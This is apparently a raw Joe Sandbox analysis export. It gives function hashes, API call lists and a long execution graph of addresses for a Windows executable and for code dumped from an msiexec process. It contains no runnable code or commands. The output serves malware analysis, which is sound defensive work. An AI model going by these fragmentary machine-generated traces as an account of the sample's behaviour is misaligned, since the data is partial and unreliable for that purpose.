                                                                                                                                                                                                                        • Instruction ID: 66ba3de4ad81a386b284ec76ae5237acc86e995a8c30c9d1c567e2ba3426b84d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3E0ED21D19A96C2D7649F50F894329A3A0FB84765F900130D58DD2764DF3CD959DB00
                                                                                                                                                                                                                        Function 00007FF6345C2F2C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C10D8: OpenProcess.KERNEL32 ref: 00007FF6345C10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6345C2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6345C2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$HeapProcess$CreateDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 3579246950-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: 868d17a59729a8917b8620ec3e2ada0c6119cde91c1ab122a96e87b8126a43a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8611E874E19A8286E720DB10F8C83AAB3A0FF8476AF400535D54DC6765DF7CE949EB40

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0.6%
                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                        Total number of Limit Nodes:31
                                                                                                                                                                                                                        execution_graph 16567 7ff7f2508c79 16579 7ff7f25096e8 16567->16579 16580 7ff7f250a460 __GetCurrentState 45 API calls 16579->16580 16581 7ff7f25096f1 16580->16581 16582 7ff7f2509814 __GetCurrentState 45 API calls 16581->16582 16583 7ff7f2509711 16582->16583 19138 7ff7f251a079 19141 7ff7f2504788 LeaveCriticalSection 19138->19141 19148 7ff7f24fbe70 19149 7ff7f24fbe80 19148->19149 19165 7ff7f2508ec0 19149->19165 19151 7ff7f24fbe8c 19171 7ff7f24fc168 19151->19171 19153 7ff7f24fbef9 19154 7ff7f24fc44c 7 API calls 19153->19154 19164 7ff7f24fbf15 19153->19164 19156 7ff7f24fbf25 19154->19156 19155 7ff7f24fbea4 _RTC_Initialize 19155->19153 19176 7ff7f24fc318 19155->19176 19158 7ff7f24fbeb9 19179 7ff7f250832c 19158->19179 19166 7ff7f2508ed1 19165->19166 19167 7ff7f25043f4 memcpy_s 11 API calls 19166->19167 19170 7ff7f2508ed9 19166->19170 19168 7ff7f2508ee8 19167->19168 19169 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19168->19169 19169->19170 19170->19151 19172 7ff7f24fc179 19171->19172 19175 7ff7f24fc17e __scrt_acquire_startup_lock 19171->19175 19173 7ff7f24fc44c 7 API calls 19172->19173 19172->19175 19174 7ff7f24fc1f2 19173->19174 19175->19155 19204 7ff7f24fc2dc 19176->19204 19178 7ff7f24fc321 19178->19158 19180 7ff7f24fbec5 19179->19180 19181 7ff7f250834c 19179->19181 19180->19153 19203 7ff7f24fc3ec InitializeSListHead 19180->19203 19182 7ff7f250836a GetModuleFileNameW 19181->19182 19183 7ff7f2508354 19181->19183 19187 7ff7f2508395 19182->19187 19184 7ff7f25043f4 memcpy_s 11 API calls 19183->19184 19185 7ff7f2508359 19184->19185 19186 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19185->19186 19186->19180 19219 7ff7f25082cc 19187->19219 19190 7ff7f25083dd 19191 7ff7f25043f4 memcpy_s 11 API calls 19190->19191 19192 7ff7f25083e2 19191->19192 19195 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19192->19195 19193 7ff7f2508417 19196 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19193->19196 19194 7ff7f25083f5 19194->19193 19197 7ff7f250845c 19194->19197 19198 7ff7f2508443 19194->19198 19195->19180 19196->19180 19201 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19197->19201 19199 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19198->19199 19200 7ff7f250844c 19199->19200 19202 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19200->19202 19201->19193 19202->19180 19205 7ff7f24fc2f6 19204->19205 19207 7ff7f24fc2ef 19204->19207 19208 7ff7f25094fc 19205->19208 19207->19178 19211 7ff7f2509138 19208->19211 19218 7ff7f250f5e8 EnterCriticalSection 19211->19218 19220 7ff7f250831c 19219->19220 19221 7ff7f25082e4 19219->19221 19220->19190 19220->19194 19221->19220 19222 7ff7f250dea8 memcpy_s 11 API calls 19221->19222 19223 7ff7f2508312 19222->19223 19224 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19223->19224 19224->19220 19632 7ff7f251a10e 19633 7ff7f251a127 19632->19633 19634 7ff7f251a11d 19632->19634 19636 7ff7f250f648 LeaveCriticalSection 19634->19636 16589 7ff7f24fbf5c 16610 7ff7f24fc12c 16589->16610 16592 7ff7f24fc0a8 16733 7ff7f24fc44c IsProcessorFeaturePresent 16592->16733 16593 7ff7f24fbf78 __scrt_acquire_startup_lock 16595 7ff7f24fc0b2 16593->16595 16601 7ff7f24fbf96 __scrt_release_startup_lock 16593->16601 16596 7ff7f24fc44c 7 API calls 16595->16596 16598 7ff7f24fc0bd __GetCurrentState 16596->16598 16597 7ff7f24fbfbb 16599 7ff7f24fc041 16616 7ff7f24fc594 16599->16616 16601->16597 16601->16599 16722 7ff7f2508e44 16601->16722 16602 7ff7f24fc046 16619 7ff7f24f1000 16602->16619 16608 7ff7f24fc069 16608->16598 16729 7ff7f24fc2b0 16608->16729 16611 7ff7f24fc134 16610->16611 16612 7ff7f24fc140 __scrt_dllmain_crt_thread_attach 16611->16612 16613 7ff7f24fbf70 16612->16613 16614 7ff7f24fc14d 16612->16614 16613->16592 16613->16593 16614->16613 16740 7ff7f24fcba8 16614->16740 16767 7ff7f25197e0 16616->16767 16620 7ff7f24f1009 16619->16620 16769 7ff7f2504794 16620->16769 16622 7ff7f24f352b 16776 7ff7f24f33e0 16622->16776 16627 7ff7f24fb870 _log10_special 8 API calls 16630 7ff7f24f372a 16627->16630 16628 7ff7f24f3736 16967 7ff7f24f3f70 16628->16967 16629 7ff7f24f356c 16631 7ff7f24f1bf0 49 API calls 16629->16631 16727 7ff7f24fc5d8 GetModuleHandleW 16630->16727 16649 7ff7f24f3588 16631->16649 16634 7ff7f24f3785 16637 7ff7f24f25f0 53 API calls 16634->16637 16721 7ff7f24f3538 16637->16721 16638 7ff7f24f3778 16640 7ff7f24f379f 16638->16640 16641 7ff7f24f377d 16638->16641 16639 7ff7f24f365f __vcrt_freefls 16644 7ff7f24f3834 16639->16644 16646 7ff7f24f7e10 14 API calls 16639->16646 16643 7ff7f24f1bf0 49 API calls 16640->16643 16986 7ff7f24ff36c 16641->16986 16645 7ff7f24f37be 16643->16645 16670 7ff7f24f3805 __vcrt_freefls 16644->16670 16990 7ff7f24f3e90 16644->16990 16657 7ff7f24f18f0 115 API calls 16645->16657 16650 7ff7f24f36ae 16646->16650 16648 7ff7f24f3852 16651 7ff7f24f3865 16648->16651 16652 7ff7f24f3871 16648->16652 16838 7ff7f24f7e10 16649->16838 16851 7ff7f24f7f80 16650->16851 16993 7ff7f24f3fe0 16651->16993 16656 7ff7f24f1bf0 49 API calls 16652->16656 16654 7ff7f24f36bd 16658 7ff7f24f380f 16654->16658 16660 7ff7f24f36cf 16654->16660 16656->16670 16659 7ff7f24f37df 16657->16659 16860 7ff7f24f8400 16658->16860 16659->16649 16663 7ff7f24f37ef 16659->16663 16856 7ff7f24f1bf0 16660->16856 16667 7ff7f24f25f0 53 API calls 16663->16667 16666 7ff7f24f389e SetDllDirectoryW 16673 7ff7f24f38c3 16666->16673 16667->16721 16911 7ff7f24f86b0 16670->16911 16671 7ff7f24f36fc 16956 7ff7f24f25f0 16671->16956 16675 7ff7f24f3a50 16673->16675 16916 7ff7f24f6560 16673->16916 16677 7ff7f24f3a7d 16675->16677 16678 7ff7f24f3a5a PostMessageW GetMessageW 16675->16678 17051 7ff7f24f3080 16677->17051 16678->16677 16681 7ff7f24f38ea 16682 7ff7f24f3947 16681->16682 16684 7ff7f24f3901 16681->16684 16996 7ff7f24f65a0 16681->16996 16682->16675 16690 7ff7f24f395c 16682->16690 16698 7ff7f24f3905 16684->16698 17017 7ff7f24f6970 16684->17017 16936 7ff7f24f30e0 16690->16936 16692 7ff7f24f6780 FreeLibrary 16694 7ff7f24f3aa3 16692->16694 16698->16682 17033 7ff7f24f2870 16698->17033 16721->16627 16723 7ff7f2508e5b 16722->16723 16724 7ff7f2508e7c 16722->16724 16723->16599 16725 7ff7f25096e8 45 API calls 16724->16725 16726 7ff7f2508e81 16725->16726 16728 7ff7f24fc5e9 16727->16728 16728->16608 16730 7ff7f24fc2c1 16729->16730 16731 7ff7f24fc080 16730->16731 16732 7ff7f24fcba8 7 API calls 16730->16732 16731->16597 16732->16731 16734 7ff7f24fc472 __GetCurrentState memcpy_s 16733->16734 16735 7ff7f24fc491 RtlCaptureContext RtlLookupFunctionEntry 16734->16735 16736 7ff7f24fc4f6 memcpy_s 16735->16736 16737 7ff7f24fc4ba RtlVirtualUnwind 16735->16737 16738 7ff7f24fc528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16736->16738 16737->16736 16739 7ff7f24fc576 __GetCurrentState 16738->16739 16739->16595 16741 7ff7f24fcbb0 16740->16741 16742 7ff7f24fcbba 16740->16742 16746 7ff7f24fcf44 16741->16746 16742->16613 16747 7ff7f24fcf53 16746->16747 16748 7ff7f24fcbb5 16746->16748 16754 7ff7f24fd180 16747->16754 16750 7ff7f24fcfb0 16748->16750 16751 7ff7f24fcfdb 16750->16751 16752 7ff7f24fcfdf 16751->16752 16753 7ff7f24fcfbe DeleteCriticalSection 16751->16753 16752->16742 16753->16751 16758 7ff7f24fcfe8 16754->16758 16759 7ff7f24fd0d2 TlsFree 16758->16759 16765 7ff7f24fd02c __vcrt_InitializeCriticalSectionEx 16758->16765 16760 7ff7f24fd05a LoadLibraryExW 16762 7ff7f24fd07b GetLastError 16760->16762 16763 7ff7f24fd0f9 16760->16763 16761 7ff7f24fd119 GetProcAddress 16761->16759 16762->16765 16763->16761 16764 7ff7f24fd110 FreeLibrary 16763->16764 16764->16761 16765->16759 16765->16760 16765->16761 16766 7ff7f24fd09d LoadLibraryExW 16765->16766 16766->16763 16766->16765 16768 7ff7f24fc5ab GetStartupInfoW 16767->16768 16768->16602 16772 7ff7f250e790 16769->16772 16770 7ff7f250e7e3 16771 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 16770->16771 16775 7ff7f250e80c 16771->16775 16772->16770 16773 7ff7f250e836 16772->16773 17064 7ff7f250e668 16773->17064 16775->16622 17072 7ff7f24fbb70 16776->17072 16779 7ff7f24f341b 17079 7ff7f24f29e0 16779->17079 16780 7ff7f24f3438 17074 7ff7f24f85a0 FindFirstFileExW 16780->17074 16784 7ff7f24f342e 16788 7ff7f24fb870 _log10_special 8 API calls 16784->16788 16785 7ff7f24f34a5 17098 7ff7f24f8760 16785->17098 16786 7ff7f24f344b 17089 7ff7f24f8620 CreateFileW 16786->17089 16791 7ff7f24f34dd 16788->16791 16791->16721 16798 7ff7f24f18f0 16791->16798 16792 7ff7f24f34b3 16792->16784 16796 7ff7f24f26c0 49 API calls 16792->16796 16793 7ff7f24f3474 __vcrt_InitializeCriticalSectionEx 16793->16785 16794 7ff7f24f345c 17092 7ff7f24f26c0 16794->17092 16796->16784 16799 7ff7f24f3f70 108 API calls 16798->16799 16800 7ff7f24f1925 16799->16800 16801 7ff7f24f1bb6 16800->16801 16803 7ff7f24f76a0 83 API calls 16800->16803 16802 7ff7f24fb870 _log10_special 8 API calls 16801->16802 16804 7ff7f24f1bd1 16802->16804 16805 7ff7f24f196b 16803->16805 16804->16628 16804->16629 16837 7ff7f24f199c 16805->16837 17443 7ff7f24ff9f4 16805->17443 16807 7ff7f24ff36c 74 API calls 16807->16801 16808 7ff7f24f1985 16809 7ff7f24f19a1 16808->16809 16810 7ff7f24f1989 16808->16810 17447 7ff7f24ff6bc 16809->17447 17450 7ff7f24f2760 16810->17450 16814 7ff7f24f19bf 16816 7ff7f24f2760 53 API calls 16814->16816 16815 7ff7f24f19d7 16817 7ff7f24f1a06 16815->16817 16818 7ff7f24f19ee 16815->16818 16816->16837 16820 7ff7f24f1bf0 49 API calls 16817->16820 16819 7ff7f24f2760 53 API calls 16818->16819 16819->16837 16821 7ff7f24f1a1d 16820->16821 16822 7ff7f24f1bf0 49 API calls 16821->16822 16823 7ff7f24f1a68 16822->16823 16824 7ff7f24ff9f4 73 API calls 16823->16824 16825 7ff7f24f1a8c 16824->16825 16826 7ff7f24f1aa1 16825->16826 16827 7ff7f24f1ab9 16825->16827 16828 7ff7f24f2760 53 API calls 16826->16828 16829 7ff7f24ff6bc _fread_nolock 53 API calls 16827->16829 16828->16837 16830 7ff7f24f1ace 16829->16830 16831 7ff7f24f1ad4 16830->16831 16832 7ff7f24f1aec 16830->16832 16833 7ff7f24f2760 53 API calls 16831->16833 17467 7ff7f24ff430 16832->17467 16833->16837 16836 7ff7f24f25f0 53 API calls 16836->16837 16837->16807 16839 7ff7f24f7e1a 16838->16839 16840 7ff7f24f86b0 2 API calls 16839->16840 16841 7ff7f24f7e39 GetEnvironmentVariableW 16840->16841 16842 7ff7f24f7e56 ExpandEnvironmentStringsW 16841->16842 16843 7ff7f24f7ea2 16841->16843 16842->16843 16844 7ff7f24f7e78 16842->16844 16845 7ff7f24fb870 _log10_special 8 API calls 16843->16845 16846 7ff7f24f8760 2 API calls 16844->16846 16847 7ff7f24f7eb4 16845->16847 16848 7ff7f24f7e8a 16846->16848 16847->16639 16849 7ff7f24fb870 _log10_special 8 API calls 16848->16849 16850 7ff7f24f7e9a 16849->16850 16850->16639 16852 7ff7f24f86b0 2 API calls 16851->16852 16853 7ff7f24f7f94 16852->16853 17673 7ff7f2507548 16853->17673 16855 7ff7f24f7fa6 __vcrt_freefls 16855->16654 16857 7ff7f24f1c15 16856->16857 16858 7ff7f2503ca4 49 API calls 16857->16858 16859 7ff7f24f1c38 16858->16859 16859->16670 16859->16671 16861 7ff7f24f8415 16860->16861 17691 7ff7f24f7b50 GetCurrentProcess OpenProcessToken 16861->17691 16864 7ff7f24f7b50 7 API calls 16865 7ff7f24f8441 16864->16865 16866 7ff7f24f8474 16865->16866 16867 7ff7f24f845a 16865->16867 16869 7ff7f24f2590 48 API calls 16866->16869 16868 7ff7f24f2590 48 API calls 16867->16868 16870 7ff7f24f8472 16868->16870 16871 7ff7f24f8487 LocalFree LocalFree 16869->16871 16870->16871 16872 7ff7f24f84a3 16871->16872 16874 7ff7f24f84af 16871->16874 17701 7ff7f24f2940 16872->17701 16875 7ff7f24fb870 _log10_special 8 API calls 16874->16875 16876 7ff7f24f3814 16875->16876 16877 7ff7f24f7c40 16876->16877 16878 7ff7f24f7c58 16877->16878 16879 7ff7f24f7c7c 16878->16879 16880 7ff7f24f7cda GetTempPathW 16878->16880 16882 7ff7f24f7e10 14 API calls 16879->16882 16881 7ff7f24f7cef 16880->16881 17707 7ff7f24f2530 16881->17707 16883 7ff7f24f7c88 16882->16883 17714 7ff7f24f77d0 16883->17714 16912 7ff7f24f86d2 MultiByteToWideChar 16911->16912 16915 7ff7f24f86f6 16911->16915 16914 7ff7f24f870c __vcrt_freefls 16912->16914 16912->16915 16913 7ff7f24f8713 MultiByteToWideChar 16913->16914 16914->16666 16915->16913 16915->16914 16917 7ff7f24f6575 16916->16917 16918 7ff7f24f2760 53 API calls 16917->16918 16919 7ff7f24f38d5 16917->16919 16918->16919 16920 7ff7f24f6b00 16919->16920 16921 7ff7f24f6b30 16920->16921 16922 7ff7f24f6b4a __vcrt_freefls 16920->16922 16921->16922 17980 7ff7f24f1440 16921->17980 16922->16681 16924 7ff7f24f6b54 16924->16922 16925 7ff7f24f3fe0 49 API calls 16924->16925 16926 7ff7f24f6b76 16925->16926 16927 7ff7f24f6b7b 16926->16927 16928 7ff7f24f3fe0 49 API calls 16926->16928 16929 7ff7f24f2870 53 API calls 16927->16929 16930 7ff7f24f6b9a 16928->16930 16929->16922 16930->16927 16931 7ff7f24f3fe0 49 API calls 16930->16931 16932 7ff7f24f6bb6 16931->16932 16932->16927 16933 7ff7f24f6bbf 16932->16933 16934 7ff7f24f25f0 53 API calls 16933->16934 16935 7ff7f24f6c2f memcpy_s __vcrt_freefls 16933->16935 16934->16922 16935->16681 16946 7ff7f24f30ee memcpy_s 16936->16946 16937 7ff7f24f32e7 16938 7ff7f24fb870 _log10_special 8 API calls 16937->16938 16939 7ff7f24f338e 16938->16939 16939->16721 16955 7ff7f24f83e0 LocalFree 16939->16955 16941 7ff7f24f1bf0 49 API calls 16941->16946 16942 7ff7f24f3309 16944 7ff7f24f25f0 53 API calls 16942->16944 16944->16937 16946->16937 16946->16941 16946->16942 16947 7ff7f24f32e9 16946->16947 16949 7ff7f24f2870 53 API calls 16946->16949 16953 7ff7f24f32f7 16946->16953 18041 7ff7f24f3f10 16946->18041 18047 7ff7f24f7530 16946->18047 18059 7ff7f24f15c0 16946->18059 18097 7ff7f24f68e0 16946->18097 18101 7ff7f24f3b40 16946->18101 18145 7ff7f24f3e00 16946->18145 16950 7ff7f24f25f0 53 API calls 16947->16950 16949->16946 16950->16937 16954 7ff7f24f25f0 53 API calls 16953->16954 16954->16937 16957 7ff7f24f262a 16956->16957 16958 7ff7f2503ca4 49 API calls 16957->16958 16959 7ff7f24f2652 16958->16959 16960 7ff7f24f86b0 2 API calls 16959->16960 16961 7ff7f24f266a 16960->16961 16962 7ff7f24f268e MessageBoxA 16961->16962 16963 7ff7f24f2677 MessageBoxW 16961->16963 16964 7ff7f24f26a0 16962->16964 16963->16964 16965 7ff7f24fb870 _log10_special 8 API calls 16964->16965 16966 7ff7f24f26b0 16965->16966 16966->16721 16968 7ff7f24f3f7c 16967->16968 16969 7ff7f24f86b0 2 API calls 16968->16969 16970 7ff7f24f3fa4 16969->16970 16971 7ff7f24f86b0 2 API calls 16970->16971 16972 7ff7f24f3fb7 16971->16972 18265 7ff7f25052a4 16972->18265 16975 7ff7f24fb870 _log10_special 8 API calls 16976 7ff7f24f3746 16975->16976 16976->16634 16977 7ff7f24f76a0 16976->16977 16978 7ff7f24f76c4 16977->16978 16979 7ff7f24ff9f4 73 API calls 16978->16979 16984 7ff7f24f779b __vcrt_freefls 16978->16984 16980 7ff7f24f76e0 16979->16980 16980->16984 18656 7ff7f2506bd8 16980->18656 16982 7ff7f24ff9f4 73 API calls 16985 7ff7f24f76f5 16982->16985 16983 7ff7f24ff6bc _fread_nolock 53 API calls 16983->16985 16984->16638 16985->16982 16985->16983 16985->16984 16987 7ff7f24ff39c 16986->16987 18671 7ff7f24ff148 16987->18671 16989 7ff7f24ff3b5 16989->16634 16991 7ff7f24f1bf0 49 API calls 16990->16991 16992 7ff7f24f3ead 16991->16992 16992->16648 16994 7ff7f24f1bf0 49 API calls 16993->16994 16995 7ff7f24f4010 16994->16995 16995->16670 16997 7ff7f24f65bc 16996->16997 16998 7ff7f24f66df 16997->16998 17000 7ff7f24f17e0 45 API calls 16997->17000 17002 7ff7f24f675d 16997->17002 17003 7ff7f24f1bf0 49 API calls 16997->17003 17005 7ff7f24f674a 16997->17005 17007 7ff7f24f3f10 10 API calls 16997->17007 17008 7ff7f24f670d 16997->17008 17009 7ff7f24f7530 52 API calls 16997->17009 17011 7ff7f24f2870 53 API calls 16997->17011 17012 7ff7f24f6737 16997->17012 17013 7ff7f24f15c0 118 API calls 16997->17013 17015 7ff7f24f6720 16997->17015 16999 7ff7f24fb870 _log10_special 8 API calls 16998->16999 17001 7ff7f24f66f1 16999->17001 17000->16997 17001->16684 17004 7ff7f24f25f0 53 API calls 17002->17004 17003->16997 17004->16998 17006 7ff7f24f25f0 53 API calls 17005->17006 17006->16998 17007->16997 17010 7ff7f24f25f0 53 API calls 17008->17010 17009->16997 17010->16998 17011->16997 17014 7ff7f24f25f0 53 API calls 17012->17014 17013->16997 17014->16998 17016 7ff7f24f25f0 53 API calls 17015->17016 17016->16998 18682 7ff7f24f81a0 17017->18682 17019 7ff7f24f6989 17020 7ff7f24f81a0 3 API calls 17019->17020 17021 7ff7f24f699c 17020->17021 17022 7ff7f24f69cf 17021->17022 17023 7ff7f24f69b4 17021->17023 17024 7ff7f24f25f0 53 API calls 17022->17024 18686 7ff7f24f6ea0 GetProcAddress 17023->18686 17026 7ff7f24f3916 17024->17026 17026->16698 17027 7ff7f24f6cd0 17026->17027 17028 7ff7f24f6ced 17027->17028 17029 7ff7f24f25f0 53 API calls 17028->17029 17032 7ff7f24f6d58 17028->17032 17030 7ff7f24f6d40 17029->17030 17031 7ff7f24f6780 FreeLibrary 17030->17031 17031->17032 17032->16698 17034 7ff7f24f28aa 17033->17034 17035 7ff7f2503ca4 49 API calls 17034->17035 17036 7ff7f24f28d2 17035->17036 17037 7ff7f24f86b0 2 API calls 17036->17037 17038 7ff7f24f28ea 17037->17038 17039 7ff7f24f290e MessageBoxA 17038->17039 17040 7ff7f24f28f7 MessageBoxW 17038->17040 17041 7ff7f24f2920 17039->17041 17040->17041 17042 7ff7f24fb870 _log10_special 8 API calls 17041->17042 17043 7ff7f24f2930 17042->17043 17044 7ff7f24f6780 17043->17044 17045 7ff7f24f68d6 17044->17045 17050 7ff7f24f6792 17044->17050 17045->16682 17046 7ff7f24f68aa 17048 7ff7f24f68c2 17046->17048 18750 7ff7f24f8180 FreeLibrary 17046->18750 17048->16682 17050->17046 18749 7ff7f24f8180 FreeLibrary 17050->18749 18751 7ff7f24f5af0 17051->18751 17054 7ff7f24f30b9 17060 7ff7f24f33a0 17054->17060 17056 7ff7f24f30a1 17056->17054 18821 7ff7f24f5800 17056->18821 17058 7ff7f24f30ad 17058->17054 18830 7ff7f24f5990 17058->18830 17061 7ff7f24f33ae 17060->17061 17062 7ff7f24f33bf 17061->17062 19024 7ff7f24f8180 FreeLibrary 17061->19024 17062->16692 17071 7ff7f250477c EnterCriticalSection 17064->17071 17073 7ff7f24f33ec GetModuleFileNameW 17072->17073 17073->16779 17073->16780 17075 7ff7f24f85f2 17074->17075 17076 7ff7f24f85df FindClose 17074->17076 17077 7ff7f24fb870 _log10_special 8 API calls 17075->17077 17076->17075 17078 7ff7f24f3442 17077->17078 17078->16785 17078->16786 17080 7ff7f24fbb70 17079->17080 17081 7ff7f24f29fc GetLastError 17080->17081 17082 7ff7f24f2a29 17081->17082 17103 7ff7f2503ef8 17082->17103 17087 7ff7f24fb870 _log10_special 8 API calls 17088 7ff7f24f2ae5 17087->17088 17088->16784 17090 7ff7f24f8660 GetFinalPathNameByHandleW CloseHandle 17089->17090 17091 7ff7f24f3458 17089->17091 17090->17091 17091->16793 17091->16794 17093 7ff7f24f26fa 17092->17093 17094 7ff7f2503ef8 48 API calls 17093->17094 17095 7ff7f24f2722 MessageBoxW 17094->17095 17096 7ff7f24fb870 _log10_special 8 API calls 17095->17096 17097 7ff7f24f274c 17096->17097 17097->16784 17099 7ff7f24f87b5 17098->17099 17100 7ff7f24f878a WideCharToMultiByte 17098->17100 17101 7ff7f24f87d2 WideCharToMultiByte 17099->17101 17102 7ff7f24f87cb __vcrt_freefls 17099->17102 17100->17099 17100->17102 17101->17102 17102->16792 17104 7ff7f2503f52 17103->17104 17105 7ff7f2503f77 17104->17105 17107 7ff7f2503fb3 17104->17107 17106 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17105->17106 17110 7ff7f2503fa1 17106->17110 17125 7ff7f25022b0 17107->17125 17109 7ff7f2504094 17112 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17109->17112 17111 7ff7f24fb870 _log10_special 8 API calls 17110->17111 17114 7ff7f24f2a54 FormatMessageW 17111->17114 17112->17110 17121 7ff7f24f2590 17114->17121 17115 7ff7f25040ba 17115->17109 17117 7ff7f25040c4 17115->17117 17116 7ff7f2504069 17118 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17116->17118 17120 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17117->17120 17118->17110 17119 7ff7f2504060 17119->17109 17119->17116 17120->17110 17122 7ff7f24f25b5 17121->17122 17123 7ff7f2503ef8 48 API calls 17122->17123 17124 7ff7f24f25d8 MessageBoxW 17123->17124 17124->17087 17126 7ff7f25022ee 17125->17126 17127 7ff7f25022de 17125->17127 17128 7ff7f25022f7 17126->17128 17133 7ff7f2502325 17126->17133 17129 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17127->17129 17130 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17128->17130 17131 7ff7f250231d 17129->17131 17130->17131 17131->17109 17131->17115 17131->17116 17131->17119 17133->17127 17133->17131 17136 7ff7f2502cc4 17133->17136 17169 7ff7f2502710 17133->17169 17206 7ff7f2501ea0 17133->17206 17137 7ff7f2502d06 17136->17137 17138 7ff7f2502d77 17136->17138 17139 7ff7f2502da1 17137->17139 17140 7ff7f2502d0c 17137->17140 17141 7ff7f2502dd0 17138->17141 17142 7ff7f2502d7c 17138->17142 17229 7ff7f2501074 17139->17229 17143 7ff7f2502d11 17140->17143 17144 7ff7f2502d40 17140->17144 17146 7ff7f2502ddf 17141->17146 17148 7ff7f2502de7 17141->17148 17149 7ff7f2502dda 17141->17149 17145 7ff7f2502db1 17142->17145 17154 7ff7f2502d7e 17142->17154 17143->17148 17151 7ff7f2502d17 17143->17151 17144->17146 17144->17151 17236 7ff7f2500c64 17145->17236 17167 7ff7f2502e10 17146->17167 17247 7ff7f2501484 17146->17247 17243 7ff7f25039cc 17148->17243 17149->17139 17149->17146 17155 7ff7f2502d52 17151->17155 17157 7ff7f2502d20 17151->17157 17165 7ff7f2502d3b 17151->17165 17154->17157 17158 7ff7f2502d8d 17154->17158 17155->17167 17219 7ff7f25037b4 17155->17219 17157->17167 17209 7ff7f2503478 17157->17209 17158->17139 17160 7ff7f2502d92 17158->17160 17160->17167 17225 7ff7f2503878 17160->17225 17161 7ff7f24fb870 _log10_special 8 API calls 17162 7ff7f250310a 17161->17162 17162->17133 17165->17167 17168 7ff7f2502ffc 17165->17168 17254 7ff7f2503ae0 17165->17254 17167->17161 17168->17167 17260 7ff7f250dd18 17168->17260 17170 7ff7f2502734 17169->17170 17171 7ff7f250271e 17169->17171 